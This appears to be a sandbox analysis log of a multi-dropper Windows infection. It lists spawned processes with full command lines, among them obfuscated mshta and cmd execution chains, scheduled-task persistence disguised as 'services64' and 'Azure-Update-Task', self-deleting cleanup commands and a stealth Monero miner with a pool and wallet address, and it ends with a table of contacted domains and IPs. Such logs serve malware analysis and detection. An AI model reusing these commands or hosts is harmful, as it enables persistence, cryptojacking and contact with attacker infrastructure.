C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe

"C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu

C:\Users\Admin\AppData\Local\Temp\49-cda23-fed-71fa2-ceb1c2164969f\Kokevicika.exe

"C:\Users\Admin\AppData\Local\Temp\49-cda23-fed-71fa2-ceb1c2164969f\Kokevicika.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /q /C cOPy /Y "C:\ProgramData\7027501.exe" C3KHKEn~m73GVLA.exE && StArT C3KHKEN~m73GVlA.exE -P48RT5mWbqdvVNE0ZvDVppXXBhLw9 & If ""== "" for %l In ( "C:\ProgramData\7027501.exe") do taskkill -Im "%~nxl" /F

C:\Windows\SysWOW64\taskkill.exe

taskkill -Im "7027501.exe" /F

C:\Users\Admin\AppData\Local\Temp\C3KHKEn~m73GVLA.exE

C3KHKEN~m73GVlA.exE -P48RT5mWbqdvVNE0ZvDVppXXBhLw9

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1768 -s 720

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1088 -s 720

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /q /C cOPy /Y "C:\ProgramData\1127203.exe" C3KHKEn~m73GVLA.exE && StArT C3KHKEN~m73GVlA.exE -P48RT5mWbqdvVNE0ZvDVppXXBhLw9 & If ""== "" for %l In ( "C:\ProgramData\1127203.exe") do taskkill -Im "%~nxl" /F

C:\Users\Admin\AppData\Roaming\services64.exe

"C:\Users\Admin\AppData\Roaming\services64.exe"

C:\Windows\SysWOW64\taskkill.exe

taskkill -Im "1127203.exe" /F

C:\Windows\SysWOW64\timeout.exe

timeout /t 6

C:\Windows\SysWOW64\explorer.exe

explorer.exe ss1

C:\Windows\SysWOW64\taskkill.exe

taskkill /im "setup.exe" /f

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe" https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e6

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'

C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe

"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -u -p 2648 -s 1740

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -u -p 1796 -s 1736

C:\Users\Admin\AppData\Local\Temp\NfmfL2gcY.exe

"C:\Users\Admin\AppData\Local\Temp\NfmfL2gcY.exe"

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3608 CREDAT:275457 /prefetch:2

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3144 -s 976

C:\Users\Admin\AppData\Local\Temp\EuFzlktjj.exe

"C:\Users\Admin\AppData\Local\Temp\EuFzlktjj.exe"

C:\Windows\explorer.exe

C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.add/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6O4DG/ZgkwoY7/pmBv4ks3wJ7PR9JPsLklOJLkitFc6Y" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth

C:\Users\Admin\AppData\Local\Temp\E003.exe

C:\Users\Admin\AppData\Local\Temp\E003.exe

C:\Users\Admin\AppData\Local\Temp\149B.exe

C:\Users\Admin\AppData\Local\Temp\149B.exe

C:\Users\Admin\AppData\Local\Temp\3E2B.exe

C:\Users\Admin\AppData\Local\Temp\3E2B.exe

C:\Users\Admin\AppData\Local\Temp\3E2B.exe

C:\Users\Admin\AppData\Local\Temp\3E2B.exe

C:\Users\Admin\AppData\Local\Temp\81FF.exe

C:\Users\Admin\AppData\Local\Temp\81FF.exe

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Users\Admin\AppData\Local\b8b16c17-1e37-4bc4-b764-dc2032a9e9cf" /deny *S-1-1-0:(OI)(CI)(DE,DC)

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" vBSCrIPt: close ( crEateobJeCt ("wsCRIpT.sHEll" ). RUN ( "C:\Windows\system32\cmd.exe /q /C cOPy /Y ""C:\Users\Admin\AppData\Local\Temp\C3KHKEn~m73GVLA.exE"" C3KHKEn~m73GVLA.exE && StArT C3KHKEN~m73GVlA.exE -P48RT5mWbqdvVNE0ZvDVppXXBhLw9 & If ""-P48RT5mWbqdvVNE0ZvDVppXXBhLw9 ""== """" for %l In ( ""C:\Users\Admin\AppData\Local\Temp\C3KHKEn~m73GVLA.exE"") do taskkill -Im ""%~nxl"" /F " , 0 , TRuE) )

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /q /C cOPy /Y "C:\Users\Admin\AppData\Local\Temp\C3KHKEn~m73GVLA.exE" C3KHKEn~m73GVLA.exE && StArT C3KHKEN~m73GVlA.exE -P48RT5mWbqdvVNE0ZvDVppXXBhLw9 & If "-P48RT5mWbqdvVNE0ZvDVppXXBhLw9 "== "" for %l In ( "C:\Users\Admin\AppData\Local\Temp\C3KHKEn~m73GVLA.exE") do taskkill -Im "%~nxl" /F

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\xzzaftf0.huv\GcleanerEU.exe /eufive & exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\1ycragm0.zlv\installer.exe /qn CAMPAIGN="654" & exit

C:\Users\Admin\AppData\Local\Temp\3E2B.exe

"C:\Users\Admin\AppData\Local\Temp\3E2B.exe" --Admin IsNotAutoStart IsNotTask

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\l0gin2iz.nv2\anyname.exe & exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\kpda1oo1.i40\gcleaner.exe /mixfive & exit

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "377912696-397879392-11339262765013140001043136397136477048-451368592-1611370245"

C:\Users\Admin\AppData\Local\Temp\3E2B.exe

"C:\Users\Admin\AppData\Local\Temp\3E2B.exe" --Admin IsNotAutoStart IsNotTask

C:\Users\Admin\AppData\Local\Temp\l0gin2iz.nv2\anyname.exe

C:\Users\Admin\AppData\Local\Temp\l0gin2iz.nv2\anyname.exe

C:\Users\Admin\AppData\Local\Temp\1ycragm0.zlv\installer.exe

C:\Users\Admin\AppData\Local\Temp\1ycragm0.zlv\installer.exe /qn CAMPAIGN="654"

C:\Users\Admin\AppData\Local\Temp\xzzaftf0.huv\GcleanerEU.exe

C:\Users\Admin\AppData\Local\Temp\xzzaftf0.huv\GcleanerEU.exe /eufive

C:\Users\Admin\AppData\Local\Temp\kpda1oo1.i40\gcleaner.exe

C:\Users\Admin\AppData\Local\Temp\kpda1oo1.i40\gcleaner.exe /mixfive

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ttqoift2.oe5\autosubplayer.exe /S & exit

C:\Users\Admin\AppData\Local\Temp\678D.exe

C:\Users\Admin\AppData\Local\Temp\678D.exe

C:\Users\Admin\AppData\Local\7535ac09-7701-4fd9-972f-2396592d31c2\build2.exe

"C:\Users\Admin\AppData\Local\7535ac09-7701-4fd9-972f-2396592d31c2\build2.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c taskkill /im "GcleanerEU.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\xzzaftf0.huv\GcleanerEU.exe" & exit

C:\Windows\SysWOW64\taskkill.exe

taskkill /im "GcleanerEU.exe" /f

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\System32\rundll32.exe" .\zyYHQ.U,xGNjygcjY

C:\Users\Admin\AppData\Local\7535ac09-7701-4fd9-972f-2396592d31c2\build3.exe

"C:\Users\Admin\AppData\Local\7535ac09-7701-4fd9-972f-2396592d31c2\build3.exe"

C:\Users\Admin\AppData\Local\7535ac09-7701-4fd9-972f-2396592d31c2\build2.exe

"C:\Users\Admin\AppData\Local\7535ac09-7701-4fd9-972f-2396592d31c2\build2.exe"

C:\Windows\system32\rundll32.exe

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global

C:\Users\Admin\AppData\Local\7535ac09-7701-4fd9-972f-2396592d31c2\build3.exe

"C:\Users\Admin\AppData\Local\7535ac09-7701-4fd9-972f-2396592d31c2\build3.exe"

C:\Windows\SysWOW64\schtasks.exe

/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c taskkill /im "gcleaner.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\kpda1oo1.i40\gcleaner.exe" & exit

C:\Windows\SysWOW64\taskkill.exe

taskkill /im "gcleaner.exe" /f

C:\Windows\system32\msiexec.exe

C:\Windows\system32\msiexec.exe /V

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c taskkill /im build2.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\7535ac09-7701-4fd9-972f-2396592d31c2\build2.exe" & del C:\ProgramData\*.dll & exit

C:\Windows\SysWOW64\taskkill.exe

taskkill /im build2.exe /f

C:\Windows\system32\taskeng.exe

taskeng.exe {150A7E10-1DC9-4E4E-8C8B-A4D5E4E6768C} S-1-5-21-1669990088-476967504-438132596-1000:KJUCCLUP\Admin:Interactive:[1]

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding 153420DCBAD02E1512F1D7ADCEAA1CF5 C

C:\Windows\SysWOW64\timeout.exe

timeout /t 6

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe" https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3608 CREDAT:2176009 /prefetch:2

C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe

"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"

C:\Users\Admin\AppData\Local\Temp\436C.exe

C:\Users\Admin\AppData\Local\Temp\436C.exe

C:\Windows\SysWOW64\msiexec.exe

"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\1ycragm0.zlv\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\1ycragm0.zlv\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1631133457 /qn CAMPAIGN=""654"" " CAMPAIGN="654"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c taskkill /im 436C.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\436C.exe" & del C:\ProgramData\*.dll & exit

C:\Windows\SysWOW64\taskkill.exe

taskkill /im 436C.exe /f

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding 799189A557F496A8DC2A5E0E52D002C1

C:\Windows\SysWOW64\timeout.exe

timeout /t 6

C:\Windows\SysWOW64\taskkill.exe

"C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2604 -s 1748

C:\Users\Admin\AppData\Local\Temp\416A.exe

C:\Users\Admin\AppData\Local\Temp\416A.exe

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding DBDC3C86249FB7636FB6C06E23CE7AB2 M Global\MSI0000

C:\Windows\SysWOW64\cmd.exe

cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\81FF.exe"

C:\Users\Admin\AppData\Local\Temp\OsaTo91wZM.exe

"C:\Users\Admin\AppData\Local\Temp\OsaTo91wZM.exe"

C:\Windows\SysWOW64\timeout.exe

timeout /T 10 /NOBREAK

C:\Windows\SysWOW64\schtasks.exe

/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sihost.exe"

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe" http://vexacion.com/afu.php?zoneid=1851483

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3608 CREDAT:1651753 /prefetch:2

C:\Windows\system32\taskeng.exe

taskeng.exe {6543594D-072E-4BFF-BC30-2439B0AF3CF1} S-1-5-18:NT AUTHORITY\System:Service:

C:\Users\Admin\AppData\Roaming\gvwgsdr

C:\Users\Admin\AppData\Roaming\gvwgsdr

C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe

"C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 114 -t 8080

C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe

"C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 115 -t 8080

C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe

"C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 113 -t 8080

C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe

"C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 112 -t 8080

C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe

"C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 111 -t 8080

C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe

"C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 110 -t 8080

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe" http://vexacion.com/afu.php?zoneid=1851513

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3608 CREDAT:2831465 /prefetch:2

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe" http://www.directdexchange.com/jump/next.php?r=2087215

C:\Users\Admin\AppData\Local\b8b16c17-1e37-4bc4-b764-dc2032a9e9cf\3E2B.exe

C:\Users\Admin\AppData\Local\b8b16c17-1e37-4bc4-b764-dc2032a9e9cf\3E2B.exe --Task

C:\Users\Admin\AppData\Roaming\gvwgsdr

C:\Users\Admin\AppData\Roaming\gvwgsdr

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe" https://www.directdexchange.com/jump/next.php?r=4263119

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3608 CREDAT:472120 /prefetch:2

C:\Users\Admin\AppData\Local\b8b16c17-1e37-4bc4-b764-dc2032a9e9cf\3E2B.exe

C:\Users\Admin\AppData\Local\b8b16c17-1e37-4bc4-b764-dc2032a9e9cf\3E2B.exe --Task

C:\Users\Admin\AppData\Local\b8b16c17-1e37-4bc4-b764-dc2032a9e9cf\3E2B.exe

C:\Users\Admin\AppData\Local\b8b16c17-1e37-4bc4-b764-dc2032a9e9cf\3E2B.exe --Task

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe" http://vexacion.com/afu.php?id=1294231

C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe

"C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 111 -t 8080

C:\Users\Admin\AppData\Local\b8b16c17-1e37-4bc4-b764-dc2032a9e9cf\3E2B.exe

C:\Users\Admin\AppData\Local\b8b16c17-1e37-4bc4-b764-dc2032a9e9cf\3E2B.exe --Task

C:\Users\Admin\AppData\Local\b8b16c17-1e37-4bc4-b764-dc2032a9e9cf\3E2B.exe

C:\Users\Admin\AppData\Local\b8b16c17-1e37-4bc4-b764-dc2032a9e9cf\3E2B.exe --Task

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe" http://vexacion.com/afu.php?zoneid=1492888&var=3

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3608 CREDAT:2503715 /prefetch:2

Network

Country Destination Domain Proto
US 8.8.8.8:53 hsiens.xyz udp
US 104.21.87.76:80 hsiens.xyz tcp
US 8.8.8.8:53 a.goatgame.co udp
US 104.21.79.144:443 a.goatgame.co tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 www.listincode.com udp
US 144.202.76.47:443 www.listincode.com tcp
US 8.8.8.8:53 statuse.digitalcertvalidation.com udp
US 72.21.91.29:80 statuse.digitalcertvalidation.com tcp
US 8.8.8.8:53 safialinks.com udp
US 8.8.8.8:53 iplogger.org udp
DE 88.99.66.31:443 iplogger.org tcp
US 162.0.213.132:80 safialinks.com tcp
US 8.8.8.8:53 startupmart.bar udp
US 8.8.8.8:53 cdn.discordapp.com udp
US 162.159.133.233:443 cdn.discordapp.com tcp
US 104.21.37.182:443 startupmart.bar tcp
N/A 127.0.0.1:49233 tcp
N/A 127.0.0.1:49235 tcp
US 8.8.8.8:53 cleaner-partners.biz udp
RU 95.181.163.181:80 cleaner-partners.biz tcp
US 8.8.8.8:53 wheelllc.bar udp
US 172.67.136.53:443 wheelllc.bar tcp
US 8.8.8.8:53 gheorghip.tumblr.com udp
US 74.114.154.18:443 gheorghip.tumblr.com tcp
US 8.8.8.8:53 connectini.net udp
US 162.0.210.44:443 connectini.net tcp
US 8.8.8.8:53 qwertys.info udp
DE 162.55.179.90:80 162.55.179.90 tcp
US 8.8.8.8:53 www.iyiqian.com udp
RU 103.155.92.58:80 www.iyiqian.com tcp
US 104.21.20.198:443 qwertys.info tcp
US 104.21.37.182:443 startupmart.bar tcp
US 8.8.8.8:53 www.mhmvc.xyz udp
RU 188.225.87.175:80 www.mhmvc.xyz tcp
US 8.8.8.8:53 live.goatgame.live udp
US 104.21.70.98:443 live.goatgame.live tcp
RU 95.181.163.181:80 cleaner-partners.biz tcp
US 8.8.8.8:53 yelty.info udp
US 104.21.17.186:443 yelty.info tcp
DE 88.99.66.31:443 iplogger.org tcp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 iplogger.com udp
US 8.8.8.8:53 liveme31.com udp
US 8.8.8.8:53 real-web-online.bar udp
US 172.67.132.120:80 liveme31.com tcp
DE 88.99.66.31:443 iplogger.com tcp
US 104.21.74.148:443 real-web-online.bar tcp
US 8.8.8.8:53 iplogger.org udp
DE 88.99.66.31:443 iplogger.org tcp
US 8.8.8.8:53 safialinks.com udp
US 162.0.213.132:80 safialinks.com tcp
US 8.8.8.8:53 requestimmersive.com udp
US 162.0.220.187:80 requestimmersive.com tcp
SC 185.215.113.104:18754 tcp
SC 185.215.113.104:18754 tcp
RU 45.9.20.20:13441 tcp
US 8.8.8.8:53 api.ip.sb udp
US 8.8.8.8:53 downloadlog.com udp
NL 142.250.179.132:80 www.google.com tcp
US 8.8.8.8:53 connectini.net udp
US 162.0.210.44:443 connectini.net tcp
RU 188.119.65.241:80 downloadlog.com tcp
US 104.26.13.31:443 api.ip.sb tcp
US 104.26.13.31:443 api.ip.sb tcp
US 8.8.8.8:53 nopedope1.com udp
US 104.26.13.31:443 api.ip.sb tcp
US 104.21.6.118:80 nopedope1.com tcp
US 8.8.8.8:53 maf-pub.com udp
US 104.21.91.222:80 maf-pub.com tcp
DE 88.99.66.31:443 iplogger.org tcp
US 8.8.8.8:53 primods.com udp
RU 188.119.65.241:80 primods.com tcp
US 8.8.8.8:53 www.profitabletrustednetwork.com udp
US 8.8.8.8:53 sanctam.net udp
US 8.8.8.8:53 gheorghip.tumblr.com udp
SE 185.65.135.234:58899 sanctam.net tcp
RU 188.119.65.241:80 primods.com tcp
US 74.114.154.18:443 gheorghip.tumblr.com tcp
US 192.243.59.20:443 www.profitabletrustednetwork.com tcp
US 192.243.59.20:443 www.profitabletrustednetwork.com tcp
US 8.8.8.8:53 bitbucket.org udp
US 104.192.141.1:443 bitbucket.org tcp
US 8.8.8.8:53 varmisende.com udp
KR 61.98.7.133:80 varmisende.com tcp
US 192.243.59.20:443 www.profitabletrustednetwork.com tcp
US 8.8.8.8:53 annual-gamers-choice.com udp
US 104.21.15.97:443 annual-gamers-choice.com tcp
US 104.21.15.97:443 annual-gamers-choice.com tcp
US 8.8.8.8:53 fernandomayol.com udp
US 8.8.8.8:53 xmr-eu2.nanopool.org udp
KR 218.51.156.7:80 fernandomayol.com tcp
US 8.8.8.8:53 pastebin.com udp
US 104.21.15.97:443 annual-gamers-choice.com tcp
US 104.21.15.97:443 annual-gamers-choice.com tcp
US 104.23.99.190:443 pastebin.com tcp
KR 218.51.156.7:80 fernandomayol.com tcp
US 8.8.8.8:53 xmr-eu1.nanopool.org udp
NL 51.15.58.224:14433 xmr-eu1.nanopool.org tcp
KR 218.51.156.7:80 fernandomayol.com tcp
MY 103.169.90.205:80 103.169.90.205 tcp
KR 218.51.156.7:80 fernandomayol.com tcp
KR 218.51.156.7:80 fernandomayol.com tcp
US 8.8.8.8:53 google.com udp
KR 218.51.156.7:80 fernandomayol.com tcp
US 8.8.8.8:53 cdn.discordapp.com udp
US 162.159.135.233:443 cdn.discordapp.com tcp
SC 185.215.113.29:8678 tcp
KR 218.51.156.7:80 fernandomayol.com tcp
NL 146.70.35.170:30905 tcp
KR 218.51.156.7:80 fernandomayol.com tcp
US 162.0.210.44:443 connectini.net tcp
US 8.8.8.8:53 securebiz.org udp
BR 138.36.3.134:80 securebiz.org tcp
US 204.79.197.200:443 ieonline.microsoft.com tcp
US 204.79.197.200:443 ieonline.microsoft.com tcp
US 104.26.13.31:443 api.ip.sb tcp
KR 218.51.156.7:80 fernandomayol.com tcp
US 104.26.13.31:443 api.ip.sb tcp
KR 218.51.156.7:80 fernandomayol.com tcp
KR 218.51.156.7:80 fernandomayol.com tcp
KR 218.51.156.7:80 fernandomayol.com tcp
KR 218.51.156.7:80 fernandomayol.com tcp
MY 103.169.90.205:80 103.169.90.205 tcp
KR 218.51.156.7:80 fernandomayol.com tcp
KR 218.51.156.7:80 fernandomayol.com tcp
KR 218.51.156.7:80 fernandomayol.com tcp
KR 218.51.156.7:80 fernandomayol.com tcp
US 8.8.8.8:53 api.2ip.ua udp
KR 218.51.156.7:80 fernandomayol.com tcp
UA 77.123.139.190:443 api.2ip.ua tcp
KR 218.51.156.7:80 fernandomayol.com tcp
KR 218.51.156.7:80 fernandomayol.com tcp
KR 218.51.156.7:80 fernandomayol.com tcp
US 8.8.8.8:53 telete.in udp
DE 195.201.225.248:443 telete.in tcp
US 162.0.220.187:80 requestimmersive.com tcp
KR 218.51.156.7:80 fernandomayol.com tcp
US 162.0.210.44:443 connectini.net tcp
UA 194.145.227.159:80 194.145.227.159 tcp
MD 5.181.156.77:80 5.181.156.77 tcp
US 8.8.8.8:53 source3.boys4dayz.com udp
US 172.67.148.61:443 source3.boys4dayz.com tcp
KR 218.51.156.7:80 fernandomayol.com tcp
KR 218.51.156.7:80 fernandomayol.com tcp
US 8.8.8.8:53 aa.goatgamea.com udp
US 172.67.221.12:443 aa.goatgamea.com tcp
US 8.8.8.8:53 bb.goatgamed.com udp
US 104.21.30.211:443 bb.goatgamed.com tcp
KR 218.51.156.7:80 fernandomayol.com tcp
US 8.8.8.8:53 htagzdownload.pw udp
DE 88.99.66.31:443 iplogger.org tcp
KR 218.51.156.7:80 fernandomayol.com tcp
KR 218.51.156.7:80 fernandomayol.com tcp
US 8.8.8.8:53 tuzlacastajanslari.bykmedya.com udp
TR 31.192.214.222:80 tuzlacastajanslari.bykmedya.com tcp
US 8.8.8.8:53 fsstoragecloudservice.com udp
BG 111.90.156.46:80 fsstoragecloudservice.com tcp
US 8.8.8.8:53 a.goatgame.co udp
US 172.67.146.70:443 a.goatgame.co tcp
UA 77.123.139.190:443 api.2ip.ua tcp
US 8.8.8.8:53 cleaner-partners.biz udp
RU 46.8.29.181:80 cleaner-partners.biz tcp
US 8.8.8.8:53 tbpws.top udp
BR 138.36.3.134:80 securebiz.org tcp
KR 210.98.149.172:80 tbpws.top tcp
KR 210.98.149.172:80 tbpws.top tcp
US 8.8.8.8:53 fernandomayol.com udp
BG 151.251.30.69:80 fernandomayol.com tcp
DE 144.76.183.53:63565 tcp
US 104.26.13.31:443 api.ip.sb tcp
RU 46.8.29.181:80 cleaner-partners.biz tcp
US 74.114.154.18:443 gheorghip.tumblr.com tcp
DE 162.55.179.90:80 162.55.179.90 tcp
KR 175.120.254.9:80 fernandomayol.com tcp
BG 151.251.30.69:80 fernandomayol.com tcp
US 8.8.8.8:53 phonefix.bar udp
US 172.67.131.66:443 phonefix.bar tcp
KR 175.120.254.9:80 fernandomayol.com tcp
US 192.243.59.20:443 www.profitabletrustednetwork.com tcp
US 192.243.59.20:443 www.profitabletrustednetwork.com tcp
BG 151.251.30.69:80 fernandomayol.com tcp
MY 103.169.90.205:80 103.169.90.205 tcp
US 8.8.8.8:53 aliexpress.5i8xkqjmqubv.top udp
RU 194.63.143.61:443 aliexpress.5i8xkqjmqubv.top tcp
RU 194.63.143.61:443 aliexpress.5i8xkqjmqubv.top tcp
BG 151.251.30.69:80 fernandomayol.com tcp
RU 194.63.143.61:443 aliexpress.5i8xkqjmqubv.top tcp
RU 194.63.143.61:443 aliexpress.5i8xkqjmqubv.top tcp
RU 194.63.143.61:443 aliexpress.5i8xkqjmqubv.top tcp
RU 194.63.143.61:443 aliexpress.5i8xkqjmqubv.top tcp
BG 151.251.30.69:80 fernandomayol.com tcp
US 8.8.8.8:53 gheorghip.tumblr.com udp
US 74.114.154.22:443 gheorghip.tumblr.com tcp
DE 162.55.179.90:80 162.55.179.90 tcp
KR 175.120.254.9:80 fernandomayol.com tcp
BG 151.251.30.69:80 fernandomayol.com tcp
BG 151.251.30.69:80 fernandomayol.com tcp
KR 175.120.254.9:80 fernandomayol.com tcp
BG 151.251.30.69:80 fernandomayol.com tcp
BG 151.251.30.69:80 fernandomayol.com tcp
BG 151.251.30.69:80 fernandomayol.com tcp
BG 151.251.30.69:80 fernandomayol.com tcp
MY 103.169.90.205:80 103.169.90.205 tcp
BG 151.251.30.69:80 fernandomayol.com tcp
US 8.8.8.8:53 iceanedy.com udp
US 104.21.86.39:443 iceanedy.com tcp
MD 5.181.156.77:80 5.181.156.77 tcp
KR 175.120.254.9:80 fernandomayol.com tcp
US 8.8.8.8:53 jaliemaval.xyz udp
RU 95.213.165.250:80 jaliemaval.xyz tcp
US 162.0.220.187:80 requestimmersive.com tcp
US 8.8.8.8:53 collect.installeranalytics.com udp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
